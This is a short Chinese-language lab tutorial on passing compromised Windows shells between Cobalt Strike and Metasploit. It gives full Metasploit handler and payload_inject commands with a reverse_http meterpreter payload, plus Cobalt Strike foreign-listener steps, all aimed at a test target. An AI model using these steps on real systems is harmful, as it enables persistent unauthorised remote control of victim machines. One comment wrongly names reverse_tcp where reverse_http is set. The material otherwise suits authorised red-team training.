目录
因为cobaltstrike和MSF各有优势,所有有时候需要互传shell。
- cs: 192.168.110.130
- msf:192.168.110.130
- 靶机:192.168.110.157
cs传shell给msf
假设cs此时获取了一个shell,然后需要将此shell传给msf
1. 在msf中创建反向监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.110.130 #如果为云服务,则填写公网ip地址
set lport 4444
2. cs创建监听器,名字为msf
选择Foreign http
3. cs执行监听器 spawn msf
此时msf收到了shell
可见是从靶机直接将shell传给msf的,此时的shell不依赖cs。cs退出此shell也不会断。
msf传shell给cs
1. cs创建监听器
选择的是http方式连接
2. msf派生shell
先把会话放到后台,设置如下。因为cs上设置的为http连接,所以我们下边payload也要对应的设置为reverse_tcp
#派生一个新的shell给cs,那么msf里面用到的exploit是
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
#禁止产生一个新的handler
set disablepayloadhandler true
#设置ip端口为cs监听的
set LHOST IP
set LPORT 端口
set session 3
run
执行run
执行之后即可得到一个cs的会话
同样,此shell也不依赖于原来msf的shell。msf shell关闭此shell依然可用